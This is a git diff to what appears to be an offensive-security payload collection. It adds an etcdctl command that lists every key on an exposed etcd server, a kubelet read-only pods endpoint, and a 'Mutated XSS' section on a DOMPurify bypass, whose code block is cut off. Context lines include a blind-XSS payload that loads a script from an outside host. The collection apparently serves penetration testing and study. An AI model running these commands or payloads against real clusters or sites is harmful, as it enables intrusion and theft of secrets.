diff --git a/Kubernetes/readme.md b/Kubernetes/readme.md index 841e3d9..8dd3470 100644 --- a/Kubernetes/readme.md +++ b/Kubernetes/readme.md @@ -141,6 +141,7 @@ curl -k https://:(8|6)443/api/v1 ```powershell curl -k https://:2379 curl -k https://:2379/version +etcdctl --endpoints=http://:2379 get / --prefix --keys-only ``` ### Kubelet API @@ -155,6 +156,7 @@ curl -k https://:10250/pods ```powershell curl -k https://:10255 +http://:10255/pods ``` diff --git a/XSS Injection/README.md b/XSS Injection/README.md index f8cac69..337c985 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -18,6 +18,7 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall - [XSS Hunter](#xss-hunter) - [Other Blind XSS tools](#other-blind-xss-tools) - [Blind XSS endpoint](#blind-xss-endpoint) +- [Mutated XSS](#mutated-xss) - [Polyglot XSS](#polyglot-xss) - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads) - [Bypass case sensitive](#bypass-case-sensitive) @@ -422,6 +423,15 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu - Comment Box - Administrative Panel +## Mutated XSS + +Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`. + +Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/. + +```javascript +